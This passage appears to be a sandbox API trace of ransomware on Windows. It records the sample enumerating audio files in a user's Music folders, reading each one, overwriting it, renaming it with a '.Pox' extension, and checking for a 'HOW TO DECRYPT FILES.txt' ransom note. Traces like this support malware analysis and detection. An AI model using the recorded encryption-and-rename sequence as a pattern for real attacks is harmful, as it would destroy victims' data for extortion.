ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", lpFilePart=0x0) returned 0x64 [0041.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\j3jecentiutlx\\bq8opoov uhdp26erw.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.184] GetFileType (hFile=0x26c) returned 0x1 [0041.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.184] GetFileType (hFile=0x26c) returned 0x1 [0041.184] WriteFile (in: hFile=0x26c, lpBuffer=0x26e0978*, nNumberOfBytesToWrite=0xff50, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x26e0978*, lpNumberOfBytesWritten=0x3ae408*=0xff50, lpOverlapped=0x0) returned 1 [0041.186] CloseHandle (hObject=0x26c) returned 1 [0041.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", lpFilePart=0x0) returned 0x64 [0041.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3.Pox", lpFilePart=0x0) returned 0x68 [0041.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\j3jecentiutlx\\bq8opoov uhdp26erw.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd246010, ftCreationTime.dwHighDateTime=0x1d4c6f2, ftLastAccessTime.dwLowDateTime=0x2269ba70, ftLastAccessTime.dwHighDateTime=0x1d4c909, ftLastWriteTime.dwLowDateTime=0x2aba7de0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xff50)) returned 1 [0041.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.188] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\j3jecentiutlx\\bq8opoov uhdp26erw.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\j3jecentiutlx\\bq8opoov uhdp26erw.mp3.pox")) returned 1 [0041.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8", lpFilePart=0x0) returned 0x4d [0041.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\", lpFilePart=0x0) returned 0x4e [0041.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4062c8 [0041.188] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.188] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78c301f0, ftCreationTime.dwHighDateTime=0x1d4cb5d, ftLastAccessTime.dwLowDateTime=0x2de32bf0, ftLastAccessTime.dwHighDateTime=0x1d4c582, ftLastWriteTime.dwLowDateTime=0x2de32bf0, ftLastWriteTime.dwHighDateTime=0x1d4c582, nFileSizeHigh=0x0, nFileSizeLow=0x1790e, dwReserved0=0x0, dwReserved1=0x0, cFileName="6H149f.mp3", cAlternateFileName="")) returned 1 [0041.188] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48941230, ftCreationTime.dwHighDateTime=0x1d4cde7, ftLastAccessTime.dwLowDateTime=0xf3296a30, ftLastAccessTime.dwHighDateTime=0x1d4d155, ftLastWriteTime.dwLowDateTime=0xf3296a30, ftLastWriteTime.dwHighDateTime=0x1d4d155, nFileSizeHigh=0x0, nFileSizeLow=0x7699, dwReserved0=0x0, dwReserved1=0x0, cFileName="D-pqVSjzYp5DDNP.m4a", cAlternateFileName="D-PQVS~1.M4A")) returned 1 [0041.188] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f403e0, ftCreationTime.dwHighDateTime=0x1d4d25d, ftLastAccessTime.dwLowDateTime=0x9ce61d30, ftLastAccessTime.dwHighDateTime=0x1d4d029, ftLastWriteTime.dwLowDateTime=0x9ce61d30, ftLastWriteTime.dwHighDateTime=0x1d4d029, nFileSizeHigh=0x0, nFileSizeLow=0x53d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gJGUjSDHXSXvdJoLAO.wav", cAlternateFileName="GJGUJS~1.WAV")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ac14d0, ftCreationTime.dwHighDateTime=0x1d4cea0, ftLastAccessTime.dwLowDateTime=0x9da59d0, ftLastAccessTime.dwHighDateTime=0x1d4ca56, ftLastWriteTime.dwLowDateTime=0x9da59d0, ftLastWriteTime.dwHighDateTime=0x1d4ca56, nFileSizeHigh=0x0, nFileSizeLow=0x15463, dwReserved0=0x0, dwReserved1=0x0, cFileName="lV H.wav", cAlternateFileName="LVH~1.WAV")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9598dad0, ftCreationTime.dwHighDateTime=0x1d4d02f, ftLastAccessTime.dwLowDateTime=0xdcaabc90, ftLastAccessTime.dwHighDateTime=0x1d4cb0c, ftLastWriteTime.dwLowDateTime=0xdcaabc90, ftLastWriteTime.dwHighDateTime=0x1d4cb0c, nFileSizeHigh=0x0, nFileSizeLow=0x4e24, dwReserved0=0x0, dwReserved1=0x0, cFileName="tqzmtg594Q.mp3", cAlternateFileName="TQZMTG~1.MP3")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18315db0, ftCreationTime.dwHighDateTime=0x1d4d070, ftLastAccessTime.dwLowDateTime=0x62529980, ftLastAccessTime.dwHighDateTime=0x1d4d328, ftLastWriteTime.dwLowDateTime=0x62529980, ftLastWriteTime.dwHighDateTime=0x1d4d328, nFileSizeHigh=0x0, nFileSizeLow=0x18d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="xAYp_gAIhi.wav", cAlternateFileName="XAYP_G~1.WAV")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.189] FindClose (in: hFindFile=0x4062c8 | out: hFindFile=0x4062c8) returned 1 [0041.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8", lpFilePart=0x0) returned 0x4d [0041.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\", lpFilePart=0x0) returned 0x4e [0041.189] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4062c8 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78c301f0, ftCreationTime.dwHighDateTime=0x1d4cb5d, ftLastAccessTime.dwLowDateTime=0x2de32bf0, ftLastAccessTime.dwHighDateTime=0x1d4c582, ftLastWriteTime.dwLowDateTime=0x2de32bf0, ftLastWriteTime.dwHighDateTime=0x1d4c582, nFileSizeHigh=0x0, nFileSizeLow=0x1790e, dwReserved0=0x0, dwReserved1=0x0, cFileName="6H149f.mp3", cAlternateFileName="")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48941230, ftCreationTime.dwHighDateTime=0x1d4cde7, ftLastAccessTime.dwLowDateTime=0xf3296a30, ftLastAccessTime.dwHighDateTime=0x1d4d155, ftLastWriteTime.dwLowDateTime=0xf3296a30, ftLastWriteTime.dwHighDateTime=0x1d4d155, nFileSizeHigh=0x0, nFileSizeLow=0x7699, dwReserved0=0x0, dwReserved1=0x0, cFileName="D-pqVSjzYp5DDNP.m4a", cAlternateFileName="D-PQVS~1.M4A")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f403e0, ftCreationTime.dwHighDateTime=0x1d4d25d, ftLastAccessTime.dwLowDateTime=0x9ce61d30, ftLastAccessTime.dwHighDateTime=0x1d4d029, ftLastWriteTime.dwLowDateTime=0x9ce61d30, ftLastWriteTime.dwHighDateTime=0x1d4d029, nFileSizeHigh=0x0, nFileSizeLow=0x53d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gJGUjSDHXSXvdJoLAO.wav", cAlternateFileName="GJGUJS~1.WAV")) returned 1 [0041.189] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ac14d0, ftCreationTime.dwHighDateTime=0x1d4cea0, ftLastAccessTime.dwLowDateTime=0x9da59d0, ftLastAccessTime.dwHighDateTime=0x1d4ca56, ftLastWriteTime.dwLowDateTime=0x9da59d0, ftLastWriteTime.dwHighDateTime=0x1d4ca56, nFileSizeHigh=0x0, nFileSizeLow=0x15463, dwReserved0=0x0, dwReserved1=0x0, cFileName="lV H.wav", cAlternateFileName="LVH~1.WAV")) returned 1 [0041.190] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9598dad0, ftCreationTime.dwHighDateTime=0x1d4d02f, ftLastAccessTime.dwLowDateTime=0xdcaabc90, ftLastAccessTime.dwHighDateTime=0x1d4cb0c, ftLastWriteTime.dwLowDateTime=0xdcaabc90, ftLastWriteTime.dwHighDateTime=0x1d4cb0c, nFileSizeHigh=0x0, nFileSizeLow=0x4e24, dwReserved0=0x0, dwReserved1=0x0, cFileName="tqzmtg594Q.mp3", cAlternateFileName="TQZMTG~1.MP3")) returned 1 [0041.190] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18315db0, ftCreationTime.dwHighDateTime=0x1d4d070, ftLastAccessTime.dwLowDateTime=0x62529980, ftLastAccessTime.dwHighDateTime=0x1d4d328, ftLastWriteTime.dwLowDateTime=0x62529980, ftLastWriteTime.dwHighDateTime=0x1d4d328, nFileSizeHigh=0x0, nFileSizeLow=0x18d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="xAYp_gAIhi.wav", cAlternateFileName="XAYP_G~1.WAV")) returned 1 [0041.190] FindNextFileW (in: hFindFile=0x4062c8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18315db0, ftCreationTime.dwHighDateTime=0x1d4d070, ftLastAccessTime.dwLowDateTime=0x62529980, ftLastAccessTime.dwHighDateTime=0x1d4d328, ftLastWriteTime.dwLowDateTime=0x62529980, ftLastWriteTime.dwHighDateTime=0x1d4d328, nFileSizeHigh=0x0, nFileSizeLow=0x18d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="xAYp_gAIhi.wav", cAlternateFileName="XAYP_G~1.WAV")) returned 0 [0041.190] FindClose (in: hFindFile=0x4062c8 | out: hFindFile=0x4062c8) returned 1 [0041.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", lpFilePart=0x0) returned 0x58 [0041.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\6h149f.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.190] GetFileType (hFile=0x26c) returned 0x1 [0041.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.190] GetFileType (hFile=0x26c) returned 0x1 [0041.190] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x1790e [0041.227] ReadFile (in: hFile=0x26c, lpBuffer=0x33e1a50, nNumberOfBytesToRead=0x1790e, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x33e1a50*, lpNumberOfBytesRead=0x3ae414*=0x1790e, lpOverlapped=0x0) returned 1 [0041.228] CloseHandle (hObject=0x26c) returned 1 [0041.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", lpFilePart=0x0) returned 0x58 [0041.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\6h149f.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.293] GetFileType (hFile=0x26c) returned 0x1 [0041.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.293] GetFileType (hFile=0x26c) returned 0x1 [0041.293] WriteFile (in: hFile=0x26c, lpBuffer=0x34577e0*, nNumberOfBytesToWrite=0x17910, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x34577e0*, lpNumberOfBytesWritten=0x3ae408*=0x17910, lpOverlapped=0x0) returned 1 [0041.295] CloseHandle (hObject=0x26c) returned 1 [0041.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3", lpFilePart=0x0) returned 0x58 [0041.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3.Pox", lpFilePart=0x0) returned 0x5c [0041.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.296] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\6h149f.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78c301f0, ftCreationTime.dwHighDateTime=0x1d4cb5d, ftLastAccessTime.dwLowDateTime=0x2de32bf0, ftLastAccessTime.dwHighDateTime=0x1d4c582, ftLastWriteTime.dwLowDateTime=0x2acb2780, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17910)) returned 1 [0041.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.296] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\6h149f.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\6H149f.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\6h149f.mp3.pox")) returned 1 [0041.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", lpFilePart=0x0) returned 0x5c [0041.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\tqzmtg594q.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.297] GetFileType (hFile=0x26c) returned 0x1 [0041.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.297] GetFileType (hFile=0x26c) returned 0x1 [0041.297] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x4e24 [0041.298] ReadFile (in: hFile=0x26c, lpBuffer=0x240772c, nNumberOfBytesToRead=0x4e24, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x240772c*, lpNumberOfBytesRead=0x3ae414*=0x4e24, lpOverlapped=0x0) returned 1 [0041.298] CloseHandle (hObject=0x26c) returned 1 [0041.315] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: 